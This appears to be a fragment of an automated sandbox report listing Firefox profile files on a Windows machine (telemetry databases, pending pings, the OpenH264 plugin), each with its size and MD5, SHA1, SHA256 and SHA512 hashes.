SHA512b18326dcc5a80973b4137de4680b28799a06019934144717fddd826d4d9f32b004c69d0b9208ffe1c838188b0998d2208818a5ab4b958df361c4437fc1a36188
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin
Filesize7KB
MD56e17936cb3b62693cfde97d87b15759e
SHA14c114bd40ee7803542f1a28225364d1eb591dcba
SHA25608d20e1ef74475f095892e2cd9c1bfe7f6fa7eaf5a0f418e44fc587fe52f5320
SHA51233f0622ead713cb27d18a249cd7f3bbe291f300594bba0cd32af3f64c76db9f16dde25893f06cf46b36e886285828887729204a70e06bf4c623e0cb3a8b304f2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD553bc5e43af738b805d53471ad4f02b7f
SHA11b068626104800bca4b77ef53af6421d6ae045ed
SHA256e1ffb005e7c1978640dcf77393c8f9145d3f74e4b43606ba3e1cb83c394ae0a8
SHA512fe1359d2689cb93328e2d34e4123900d04c845138729120b7ffb272a74315ce851760c02b5f3f4c8b1b0c655582cbc156df4fc0b1e26445c81e1967c228ee234
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5dbfffba822ed9d03010ead65824e7527
SHA1ada12b49c35e9b1a2c48784f0318ac3d54b4b957
SHA256be4470ceacfc1e0187d39ea40f5c7544d44321e37a2faeedbab4c6167b907415
SHA51254c6bd5f1b66db24f2df4e8754619c5c58f5802e6bcdc08f80fe00c81f77367d9f3059e99da31ed7cfcddf1fa759839eb6932974a8f8df5ed4fafa36707dd3ca
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD5b30344a9c82247ba4967aca01db89c9c
SHA1615f3fdf41cc7c9320f2856ef2bc418e71fb2f27
SHA256b47eecdc346a9d7e942274bd56bf930ae3969a8cc7a54e06d62e3de56ecf1ae7
SHA5125df6b368feae55b5fdbb972ffa74cb76f5fc8bd3b89780c92395b2eeeb8172d99ab2ad92664808b19ae55b4b539ea1c27dfe5a10dd4e1bef894ba91f08071bc9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\0e9f4f13-932a-4576-88c4-f210f6e764f1
Filesize671B
MD5c0fd08c0fa11e273ae9364dc957adcac
SHA12e89569deccace1ee632ed277b65161b6ae01054
SHA2563d09fe0c660e4fc7d03043f185b0aa17190fe23098517eca7a5bd9f6b2e8a01e
SHA512699e4c6cd5ff606a6ebf343ba6059a151d7ceb7d4c0f71a4ded5cc92e46982973a0b6701f7cc90ede700f20949b4f44c5adb5cea9511999040a142a078dea485
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\7973161b-f583-4dde-98a7-300882a72a0e
Filesize982B
MD50aae46b6b8baa7f67d85a01df0bbf6f5
SHA195a091fda1656466f7c038ca3d5954ecd4e5d16b
SHA2562ad02ce2b72365b3024bacaaef079180c9415a9b52f450dba33591d316070c5a
SHA51285273eabd4b50105ca23651818dee2cf0f23c8b8b71d2761303db10d009427d006d2c763f2b43a47dcc80dac4bafd44a4154a546efe997d40a25a3f1ef6934f0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\a4a6bc5f-ca76-4939-8fa6-bfd1d45cd9b4
Filesize26KB
MD51055cc7857b78111e1e1e552371ae438
SHA1b40691d77c48514a7458687a4e2d05bcd21ac1b8
SHA2569ba98e9cb4ee293417e664af19533afec729430ae9583117cbcb3777ee2bae0d
SHA51261e87bef92a727a1c3d29e81957f0360fde7267483b046179578e11489d05f8c9459fcde627cf11720ceaf784bdde034c02a54ab32cac554f974f97189c79e1e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
Filesize
10KB
MD5c4e76461fbd0e9690e4ac75eb5eabf0c
SHA1544d41b6d9d34f2b5fbe4ff279281113a68168f4
SHA256e1d0f004a0692d0da06f9b2ba674e581bd44e3e7680f2ef1373d99c549a7a1cb
SHA512aa31a6589b78be2a026ddd151438ca6ace397481439e3937d7acf94fe18bb202c400d512cacf200ddc53a04693dbfe6b19e3407850e88c4543ad9a04c1a922cd
-
Filesize
12KB
MD5100ee86c9ea952622272c2251ccd84fa
SHA1c558c4c567a497582d9e3637309c7b8f5580969e
SHA256c07b4020034d78944101ec74f7d4e100e1b0a295725c9e75d3cc6b4039a53da0
SHA512d25b3eea56009526059a5a390adac427013c4a2a48bf07b3ec47cbf673f561ab8e38c873eda335c7a398712b0a9ed09f1e790e95a05daf09f0c516d7467f8b4a
-
Filesize
10KB
MD5929685579eef45ff6441c54e0921984e
SHA162a204a81bd48e80dc268ea50b147eca8c908dd6
SHA2569b0334f0794d1b33ca5ed80a38f1dc0c3d0a454e596161a17e678d271f0dc7ab
SHA512764ecc7e1904117a98f6071e23950bf8300f0bdfb31bc0dca23af73654d67570777e5d11f52a10e0d545937e5e97b10a9d8208c0e002dd538e3212facdbbe657